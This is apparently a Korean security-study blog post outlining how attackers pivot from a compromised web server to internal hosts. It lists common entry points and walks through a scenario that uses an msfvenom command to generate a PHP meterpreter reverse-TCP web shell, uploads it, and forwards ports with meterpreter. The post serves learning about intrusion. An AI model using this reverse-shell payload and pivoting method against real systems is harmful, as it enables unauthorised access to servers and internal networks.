1. 시스템에 침투하는 1차 지점
- 파일 업로드 취약점으로 인한 "웹쉘" 업로드
- 서버 설정 미흡 사례 - Tomcat Manager, WebDAV 취약점
- 웹 어플리케이션 취약점 사례 - SQLi, PHP Injection, Aapche Struts..
- 윈도우 어플리케이션 취약점 - BoF 취약점, RCE 취약점
- 개인 PC 대상으로 악성코드 배포
2. 포트포워딩을 이용한 2차 침투
공격자 PC → 서버 1차 침투 (웹 서버) → 내부 서버(DBMS, 로그 서버 등) → 개인 PC
- 터널링 기법 (SSH 터널링, HTTP 터널링)
- 포트포워딩 기법
공격자 A가 희생자 B 웹서버의 파일 업로드 취약점을 통해서
백도어를 업로드해 Reverse connection을 연결한 뒤,
내부서버 C로 가는 포트를 연결 시키는 시나리오
1) msfvenom 으로 웹쉘 작성
msfvenom = msfpayload + msfencoder
-p : payload 설정
┌──(root㉿kali)-[/home/kali]
└─# msfvenom -p php/meterpreter/reverse_tcp LPORT=9999 > msf_shell.php
2) msfconsole에서 handler를 열어준다.
작성한 웹쉘에 맞추어 handler 오픈
3) 희생자 B 웹서버에 파일업로드 취약점을 이용해 만든 웹쉘을 업로드 후 실행
4) 연결된 meterpreter에서 portfwd를 이용해 내부서버 C로 연결
'Security Project' 카테고리의 다른 글
47. Veil 프레임워크를 활용한 악성코드 (0) | 2023.02.01 |
---|---|
46. metasploit 시스템 침투 심화 (0) | 2023.01.25 |
44. 파일 업로드 취약점 대응 (시큐어코딩, 보안설정, 웹쉘차단 솔루션) (0) | 2023.01.23 |
43. 파일 업로드 취약점 조건 및 우회 (0) | 2023.01.23 |
42. 파일업로드 취약점 이해와 공격 목적 (0) | 2023.01.15 |
댓글